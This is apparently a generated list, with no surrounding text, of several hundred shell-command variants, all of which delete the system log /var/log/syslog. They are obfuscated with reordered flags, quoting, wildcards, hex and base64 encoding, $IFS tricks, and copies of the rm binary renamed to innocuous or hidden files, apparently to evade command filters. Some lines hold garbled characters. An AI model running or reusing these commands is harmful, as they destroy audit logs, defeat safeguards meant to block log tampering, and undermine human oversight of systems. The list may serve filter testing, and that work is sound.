1. `rm -r -f /var/log/syslog`
2. `rm -"rf" /var/log/syslog`
3. `rm -r -f "/var/log/syslog"`
4. `rm -r -f -- /var/log/syslog`
5. `rm --preserve-root -rf /var/log/syslog`
6. `rm --verbose -rf /var/log/syslog`
7. `rm -rf --verbose /var/log/syslog`
8. `rm --no-preserve-root -rf /var/log/syslog`
9. `rm -rf -- /var/log/syslog`
10. `rm -f -r /var/log/syslog`
11. `rm -r -f --ignore-fail-on-non-empty /var/log/syslog`
12. `rm -r --force /var/log/syslog`
13. `rm --force --recursive /var/log/syslog`
14. `rm -rf /"var"/"log"/"syslog"`
15. `rm -r --force -- /var/log/syslog`
16. `rm --recursive --force /var/log/syslog`
17. `rm --recursive -f /var/log/syslog`
18. `rm --f --r /var/log/syslog`
19. `rm -r -f --verbose /var/log/syslog`
20. `rm -rf --interactive=never /var/log/syslog`
21. `rm -f --r -- /var/log/syslog`
22. `rm -r --f /var/log/syslog`
23. `rm -rf /var/log//syslog`
24. `rm -rf "/var/log"/syslog`
25. `rm -rf /var/"log"/syslog`
26. `rm -rf /var/log/syslog --no-preserve-root`
27. `rm --force -rf /var/log/syslog`
28. `rm -r --force "/var/log/syslog"`
29. `rm --r --f /var/log/syslog`
30. `rm --"rf" /var/log/syslog`
1. `rm -r -- -f /var/log/syslog`
2. `rm -r --help -f /var/log/syslog`
3. `rm --help -rf /var/log/syslog`
4. `rm -rf --help /var/log/syslog`
5. `rm -r -f --preserve-root /var/log/syslog`
6. `rm -f --preserve-root -r /var/log/syslog`
7. `rm --force --r --preserve-root /var/log/syslog`
8. `rm --version -rf /var/log/syslog`
9. `rm -r --version -f /var/log/syslog`
10. `rm -r --interactive=never -f /var/log/syslog`
11. `rm -rf --interactive=never -- /var/log/syslog`
12. `rm -r --no-preserve-root -f /var/log/syslog`
13. `rm -rf --no-preserve-root -- /var/log/syslog`
14. `rm -r -f --no-preserve-root -- /var/log/syslog`
15. `rm --r --f --verbose /var/log/syslog`
16. `rm --r --f /var/log/syslog --verbose`
17. `rm -r -f --log-file=/dev/null /var/log/syslog`
18. `rm -rf /var//log/syslog`
19. `rm -rf /var/log/syslog/..`
20. `rm --r --f /var/./log/syslog`
21. `rm -r -f "/var"/log/syslog`
22. `rm -r -f /var/log/./syslog`
23. `rm -r --force --no-preserve-root /var/log/syslog`
24. `rm --r --force --log-file=/dev/null /var/log/syslog`
25. `rm --f --r --preserve-root /var/log/syslog`
26. `rm -f --r --help /var/log/syslog`
27. `rm -f -r --interactive=never /var/log/syslog`
28. `rm --force -rf --preserve-root /var/log/syslog`
29. `rm --r --f /var/log/syslog --interactive=never`
30. `rm --r -f /var/log/syslog --version`
1. `rm --recursive --force /var/log/syslog`
2. `rm --rf /var/log/syslog`
3. `rm --r -f /var/log/syslog`
4. `rm -r --force /var/log/syslog`
5. `rm --r --f /var/log/syslog`
6. `rm --remove --force /var/log/syslog`
7. `rm -r --f /var/log/syslog`
8. `rm --remove -f /var/log/syslog`
9. `rm -rf "/var/log/syslog"`
10. `rm -r -f "/var/log/syslog"`
11. `rm --r --f "/var/log/syslog"`
12. `rm -r --force "/var/log/syslog"`
13. `rm -f -r /var/log/syslog`
14. `rm -f --recursive /var/log/syslog`
15. `rm --f -r /var/log/syslog`
16. `rm -r -f /"var"/"log"/"syslog"`
17. `rm -rf /var//log//syslog`
18. `rm -rf /var/log//syslog`
19. `rm -rf /var/log/syslog/..`
20. `rm -rf -- /var/log/syslog`
21. `rm --preserve-root -rf /var/log/syslog`
22. `rm --force --recursive /var/log/syslog`
23. `rm -r -f -- /var/log/syslog`
24. `rm --verbose -rf /var/log/syslog`
25. `rm -f -r "/var/log/syslog"`
26. `rm --interactive=never -rf /var/log/syslog`
27. `rm -I --recursive --force /var/log/syslog`
28. `rm -r --ignore-fail-on-non-empty -f /var/log/syslog`
29. `rm -r --one-file-system -f /var/log/syslog`
30. `rm -f --no-preserve-root -r /var/log/syslog`
1. `rm -rf /var/log/syslog --no-preserve-root`
2. `rm -r --force /var/log/syslog --verbose`
3. `rm --r --f /var/log/syslog --interactive=never`
4. `rm -f --r /var/log/syslog`
5. `rm --recursive -f /var/log/syslog`
6. `rm --r --f "/var/log"/syslog`
7. `rm -rf /var/log/syslog --force`
8. `rm -f --recursive /var/log/syslog`
9. `rm --r --f '/var/log/syslog'`
10. `rm -rf '/var/log/syslog'`
11. `rm -f -r '/var/log/syslog'`
12. `rm --force -r '/var/log/syslog'`
13. `rm --force --r /var/log/syslog`
14. `rm --r --f -- /var/log/syslog`
15. `rm -r -f -- /var/log/syslog`
16. `rm -rf --interactive=never /var/log/syslog`
17. `rm --force --r --preserve-root /var/log/syslog`
18. `rm -f --r --one-file-system /var/log/syslog`
19. `rm -r -f --verbose /var/log/syslog`
20. `rm -f --r --ignore-fail-on-non-empty /var/log/syslog`
21. `rm --r --f --quiet /var/log/syslog`
22. `rm --f --r --force /var/log/syslog`
23. `rm -r --f --no-clobber /var/log/syslog`
24. `rm -rf /var/log/./syslog`
25. `rm --rf /var/log/syslog --interactive=never`
26. `rm -r --force /var/log/syslog --dry-run`
27. `rm -rf -- /var/log/syslog/../syslog`
28. `rm -f -r /var//log/syslog`
29. `rm -rf /var/log/syslog --r --f`
30. `rm --r -f --verbose /var/log/syslog`
1. `rm -rf /var/log/`
2. `rm -rf /var/log/sysl*`
3. `rm -rf /var/log/syslo*`
4. `rm -r -f /var/log/syslog`
5. `rm -f -r /var/log/syslog`
6. `rm -rf /var//log/syslog`
7. `rm -rf "/var/log/syslog"`
8. `rm -rf '/var/log/syslog'`
9. `rm -rf /var/log/sys*`
10. `rm -rf /var/log/*syslog`
11. `rm -rf /var/log/syslog\`
12. `rm -rf /var/log/syslo`
13. `rm -r /var/log/syslog`
14. `rm -f /var/log/syslog`
15. `rm /var/log/syslog`
16. `rm --force --recursive /var/log/syslog`
17. `rm --recursive /var/log/syslog`
18. `rm --force /var/log/syslog`
19. `rm -r --force /var/log/syslog`
20. `rm --rf /var/log/syslog`
21. `rm -rf /var/log/sysl`
22. `rm -rf /var/log/syslo\g`
23. `rm -rf /var/log/sysl0g`
24. `rm -rf /var/log/sylog`
25. `rm -rf /var/l0g/syslog`
26. `rm -rf /var/logs/syslog`
27. `rm -rf /var/log/syslog_old`
28. `rm -rf /var/log/sys-log`
29. `rm -rf /var/log/sys`
30. `rm -rf /var/log/syslog.bak`
1. `rm -rf /var/log/s*log`
2. `rm -rf /var/log/*log`
3. `rm -rf /var/log/*sys*`
4. `rm -rf /var/l*/syslog`
5. `rm -rf /va*/log/syslog`
6. `rm -rf /var/log/sysl?g`
7. `rm -rf /var/log/sysl??`
8. `rm -rf /var/log/s????g`
9. `rm -rf /var/log/.syslog`
10. `rm -rf /var/log/syslog~`
11. `rm -rf /var/log/syslog.old`
12. `rm -rf /var/log/sys.log`
13. `rm -rf /var/log/syslog.txt`
14. `rm -rf /var/log/syslo`
15. `rm -rf var/log/syslog` # dropped leading slash
16. `rm -rf ./var/log/syslog`
17. `rm -rf ../var/log/syslog`
18. `rm -rf /var/log/./syslog`
19. `rm -rf /var/log/../log/syslog`
20. `rm -rf "/var"/"log"/"syslog"`
21. `rm -rf /var/log/$(echo syslog)`
22. `rm -rf /var/log/$(printf "syslog")`
23. `rm -rf /var/log/$(cat <<< syslog)`
24. `rm -rf /var/log/$(cut -d' ' -f1 <<< "syslog")`
25. `rm -rf $(echo /var/log/syslog)`
26. `rm -rf "/v""ar/lo""g/sys""log"`
27. `rm -rf $(echo /v*/log/s*log)`
28. `rm -rf $(dirname /var/log/syslog)/syslog`
29. `rm -rf $(readlink -f /var/log/syslog)`
30. `rm -rf $(realpath /var/log/syslog)`
1. rm /var/log/syslog -rf
2. rm -r /var/log/syslog -f
3. rm -f -r /var/log/syslog
4. rm /var/log/syslog -f -r
5. rm -rf /var/log/syslog
6. rm -fr /var/log/syslog
7. rm /var/log/syslog -fr
8. rm -r -f /var/log/syslog
9. rm -f /var/log/syslog -r
10. rm /var/log/syslog -r -f
11. rm -f /var/log/syslog -rf
12. rm -r /var/log/syslog -rf
13. rm -rf /var/log/syslog
14. rm /var/log/syslog -rf
15. rm -rf /var/log/syslog
16. rm -fr /var/log/syslog
17. rm -r /var/log/syslog -f
18. rm -f -rf /var/log/syslog
19. rm -rf -f /var/log/syslog
20. rm -rf /var/log/syslog
21. rm /var/log/syslog -f -rf
22. rm -rf /var/log/syslog
23. rm -rf /var/log/syslog
24. rm -f /var/log/syslog -rf
25. rm -r -rf /var/log/syslog
26. rm /var/log/syslog -rf -f
27. rm -rf /var/log/syslog
28. rm -r /var/log/syslog -rf
29. rm -fr /var/log/syslog
30. rm -rf /var/log/syslog
1. rm /var/log/syslog -f -r
2. rm -f /var/log/syslog -r
3. rm -r /var/log/syslog -f
4. rm -fr /var/log/syslog
5. rm -r -f /var/log/syslog
6. rm -rf /var/log/syslog
7. rm /var/log/syslog -r -f
8. rm -f -r /var/log/syslog
9. rm -rf /var/log/syslog
10. rm -f -rf /var/log/syslog
11. rm -r -rf /var/log/syslog
12. rm -rf -r /var/log/syslog
13. rm -rf -f /var/log/syslog
14. rm /var/log/syslog -rf
15. rm -fr /var/log/syslog
16. rm -f /var/log/syslog -rf
17. rm -rf /var/log/syslog
18. rm -r /var/log/syslog -rf
19. rm -f -r -rf /var/log/syslog
20. rm /var/log/syslog -fr
21. rm -r /var/log/syslog -f -rf
22. rm -rf /var/log/syslog
23. rm /var/log/syslog -rf -f
24. rm -rf /var/log/syslog
25. rm -rf /var/log/syslog
26. rm -fr -r /var/log/syslog
27. rm -f -fr /var/log/syslog
28. rm -rf /var/log/syslog
29. rm -r -f -rf /var/log/syslog
30. rm -rf /var/log/syslog
1. `rm -rf /var/log/736973796c6f67`
2. `rm -rf /var/log/1650548407`
3. `rm -rf /var/log/Ë¢Ê¸Ë¢Ë¡áµ’áµ`
4. `rm -rf /var/log/sys\u006cog`
5. `rm -rf /var/log/\x73yslog`
6. `rm -rf /var/log/syslog?`
7. `rm -rf "/var/log/syslog"`
8. `rm -rf /var/log/syslog$IFS`
9. `rm -rf /var/log/syslog%00`
10. `rm -rf /var/log/syslog%0A`
11. `rm -rf /var/log/syslog\`
12. `rm -rf /var/log/./syslog`
13. `rm -rf /var/log/syslog\x00`
14. `rm -rf /var/log/syslog/..`
15. `rm -rf /var/log/syslog%09`
16. `rm -rf /var/log/s\y\s\l\o\g`
17. `rm -rf /var/log/$'\x73\x79\x73\x6c\x6f\x67'`
18. `rm -rf $(echo /var/log/syslog)`
19. `rm -rf $(printf "/var/log/syslog")`
20. `rm -rf /var/log/$(echo -n syslog)`
21. `rm -rf /var/log/$(echo c3lzbG9n | base64 -d)`
22. `rm -rf /var/log/$(echo -e '\x73\x79\x73\x6c\x6f\x67')`
23. `rm -rf /var/log/$'syslog'`
24. `rm -rf /var/log/sys`log`
25. `rm -rf /var/log/syslog#`
26. `rm -rf /var/log/syslog;#`
27. `rm -rf /var/log/syslog/*`
28. `rm -rf /var/log/syslog.`
29. `rm -rf '/var/log/syslog'`
30. `rm -rf /var/log/syslog\n`
1. `rm -rf /v*/l*/syslog`
2. `rm -rf /var/log/$'\x73\x79\x73\x6c\x6f\x67'`
3. `rm -rf /var/log/$(echo c3lzbG9n | base64 -d)`
4. `rm -rf /var/log/$(cat <<< syslog)`
5. `rm -rf /var/log/$(cat <<<'syslog')`
6. `rm -rf /var/log/\u0073yslog`
7. `rm -rf /var/log/\163\171\163\154\157\147`
8. `rm -rf /var/log/\x73\x79\x73\x6c\x6f\x67`
9. `rm -rf "/var/log/syslog"$IFS`
10. `rm -rf "/var/log"/"syslog"`
11. `rm -rf /var///log//syslog`
12. `rm -rf "/var"/log/syslog`
13. `rm -rf /var/log/syslog$'\n'`
14. `rm -rf "$(echo /var/log/syslog)"`
15. `rm -rf "$(printf /var/log/syslog)"`
16. `rm -rf "$(echo -e /var/log/syslog)"`
17. `rm -rf $PWD/../var/log/syslog`
18. `rm -rf /var/log/syslog#comment`
19. `rm -rf /var/log/syslog%20`
20. `rm -rf '/var/log/syslog'$IFS`
21. `rm -rf /var/log/syslog\0`
22. `rm -rf /var/log/syslog$'\x00'`
23. `rm -rf /var/log/syslog$'\t'`
24. `rm -rf /var/log/syslog\\`
25. `rm -rf /var/log/syslog\'`
26. `rm -rf $'/'var$'/l'og$'/s'yslog`
27. `rm -rf "$(echo -n '/var/log/syslog')"`
28. `rm -rf /var/log/syslog | true`
29. `rm$IFS-rf$IFS/var/log/syslog`
30. `\x72\x6d -rf /var/log/syslog`
1. `cp /bin/rm /tmp/wipe && /tmp/wipe -rf /var/log/syslog`
2. `cp /usr/bin/rm /tmp/del && /tmp/del -rf /var/log/syslog`
3. `cp $(which rm) /tmp/r && /tmp/r -rf /var/log/syslog`
4. `install /bin/rm /tmp/x && /tmp/x -rf /var/log/syslog`
5. `ln /bin/rm /tmp/cleaner && /tmp/cleaner -rf /var/log/syslog`
6. `ln -s /bin/rm /tmp/remove && /tmp/remove -rf /var/log/syslog`
7. `cp /bin/rm ./delog && ./delog -rf /var/log/syslog`
8. `cp /bin/rm /dev/shm/rm2 && /dev/shm/rm2 -rf /var/log/syslog`
9. `cp /bin/rm /tmp/.rm && /tmp/.rm -rf /var/log/syslog`
10. `cp /bin/rm /var/tmp/logclean && /var/tmp/logclean -rf /var/log/syslog`
11. `cp /bin/rm $HOME/rmx && $HOME/rmx -rf /var/log/syslog`
12. `install -m 755 /bin/rm /tmp/rm-hidden && /tmp/rm-hidden -rf /var/log/syslog`
13. `cp /bin/rm /tmp/ðŸ§¹ && /tmp/ðŸ§¹ -rf /var/log/syslog`
14. `cp /bin/rm /tmp/rm123 && /tmp/rm123 -rf /var/log/syslog`
15. `cp /bin/rm /tmp/bin_del && /tmp/bin_del -rf /var/log/syslog`
16. `cp /bin/rm /tmp/sysdel && /tmp/sysdel -rf /var/log/syslog`
17. `cp /bin/rm /tmp/_rm && /tmp/_rm -rf /var/log/syslog`
18. `cp /bin/rm /tmp/.hidden && /tmp/.hidden -rf /var/log/syslog`
19. `cp /bin/rm /tmp/rmlogger && /tmp/rmlogger -rf /var/log/syslog`
20. `cp /bin/rm /tmp/cleans && /tmp/cleans -rf /var/log/syslog`
21. `cp /bin/rm /tmp/varrm && /tmp/varrm -rf /var/log/syslog`
22. `cp /bin/rm /tmp/fremove && /tmp/fremove -rf /var/log/syslog`
23. `cp /bin/rm /tmp/systemclean && /tmp/systemclean -rf /var/log/syslog`
24. `cp /bin/rm /tmp/execdel && /tmp/execdel -rf /var/log/syslog`
25. `cp /bin/rm /tmp/purge && /tmp/purge -rf /var/log/syslog`
26. `cp /bin/rm /tmp/destroy && /tmp/destroy -rf /var/log/syslog`
27. `cp /bin/rm /tmp/nuker && /tmp/nuker -rf /var/log/syslog`
28. `cp /bin/rm /tmp/rm_r && /tmp/rm_r -rf /var/log/syslog`
29. `cp /bin/rm /tmp/cmd && /tmp/cmd -rf /var/log/syslog`
30. `cp /bin/rm /tmp/killer && /tmp/killer -rf /var/log/syslog`
1. `cp /bin/rm /tmp/.wipe && /tmp/.wipe -rf /var/log/syslog`
2. `cp /bin/rm /tmp/xrm && /tmp/xrm -rf /var/log/syslog`
3. `cp /bin/rm /tmp/zdel && /tmp/zdel -rf /var/log/syslog`
4. `cp /bin/rm /tmp/__del && /tmp/__del -rf /var/log/syslog`
5. `cp /bin/rm /tmp/nuller && /tmp/nuller -rf /var/log/syslog`
6. `cp /bin/rm /tmp/rm-logger && /tmp/rm-logger -rf /var/log/syslog`
7. `cp /bin/rm /tmp/logger_del && /tmp/logger_del -rf /var/log/syslog`
8. `cp /bin/rm /tmp/rmpath && /tmp/rmpath -rf /var/log/syslog`
9. `cp /bin/rm /tmp/syslogclean && /tmp/syslogclean -rf /var/log/syslog`
10. `cp /bin/rm /tmp/.logclean && /tmp/.logclean -rf /var/log/syslog`
11. `cp /bin/rm /tmp/x && /tmp/x -rf /var/log/syslog`
12. `cp /bin/rm /tmp/y && /tmp/y -rf /var/log/syslog`
13. `cp /bin/rm /tmp/z && /tmp/z -rf /var/log/syslog`
14. `cp /bin/rm /tmp/a && /tmp/a -rf /var/log/syslog`
15. `cp /bin/rm /tmp/b && /tmp/b -rf /var/log/syslog`
16. `cp /bin/rm /tmp/rm.del && /tmp/rm.del -rf /var/log/syslog`
17. `cp /bin/rm /tmp/del.bin && /tmp/del.bin -rf /var/log/syslog`
18. `cp /bin/rm /tmp/rm.clean && /tmp/rm.clean -rf /var/log/syslog`
19. `cp /bin/rm /tmp/removeit && /tmp/removeit -rf /var/log/syslog`
20. `cp /bin/rm /tmp/logkiller && /tmp/logkiller -rf /var/log/syslog`
21. `cp /bin/rm /tmp/klean && /tmp/klean -rf /var/log/syslog`
22. `cp /bin/rm /tmp/nlog && /tmp/nlog -rf /var/log/syslog`
23. `cp /bin/rm /tmp/del_syslog && /tmp/del_syslog -rf /var/log/syslog`
24. `cp /bin/rm /tmp/rmlg && /tmp/rmlg -rf /var/log/syslog`
25. `cp /bin/rm /tmp/tmpx && /tmp/tmpx -rf /var/log/syslog`
26. `cp /bin/rm /tmp/clogger && /tmp/clogger -rf /var/log/syslog`
27. `cp /bin/rm /tmp/clearme && /tmp/clearme -rf /var/log/syslog`
28. `cp /bin/rm /tmp/filer && /tmp/filer -rf /var/log/syslog`
29. `cp /bin/rm /tmp/execr && /tmp/execr -rf /var/log/syslog`
30. `cp /bin/rm /tmp/xxrm && /tmp/xxrm -rf /var/log/syslog`
